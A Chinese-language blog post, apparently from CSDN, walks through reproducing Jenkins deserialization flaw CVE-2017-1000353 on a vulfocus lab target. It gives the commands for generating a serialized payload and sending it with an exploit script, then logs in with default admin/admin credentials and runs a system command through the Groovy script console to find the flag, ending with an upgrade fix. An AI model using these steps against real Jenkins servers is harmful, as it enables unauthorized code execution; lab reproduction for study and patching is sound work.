[漏洞复现]vulfocus/jenkins-cve_2017_1000353

本文档详细介绍了如何复现Jenkins的反序列化漏洞,该漏洞允许攻击者在目标服务器上执行任意代码。作者首先尝试使用生成的poc工具在Windows和Linux环境下复现,但由于权限问题未能成功。接着,通过弱口令登录Jenkins并使用系统管理中的脚本命令行执行命令,找到了flag。最后,文章提到了漏洞的修复方案,即升级Jenkins版本。
摘要由CSDN通过智能技术生成

简介

Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限

建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。

利用工具复现

1.首先下载生成poc工具

执行如下代码,生成字节码文件jenkins_poc.ser,这便是序列化字符串。

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

我首先在windows10上生成字节码文件,但是说不能进入jarfile,所以就放到了linux上

Error: Unable to access jarfile CVE-2017-1000353-SNAPSHOT-all.jar

2.然后下载exp文件

发送字节码文件

python3 exploit.py http://ip:port jenkins_poc.ser

执行成功后,会在靶机/tmp目录看到success文件。
因为我用的vulfocus复现,无法反弹shell,所以看不到。


经过搜索,发现竟然可以使用默认账号密码登录,上面执行的命令直接无用,最后以软口令完成任务。
使用admin/admin登录成功

在这里插入图片描述
登录成功后,在左边找到系统管理,然后找到脚本命令行,输入

println "ls /tmp".execute().text

在这里插入图片描述

漏洞修复

升级版本

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值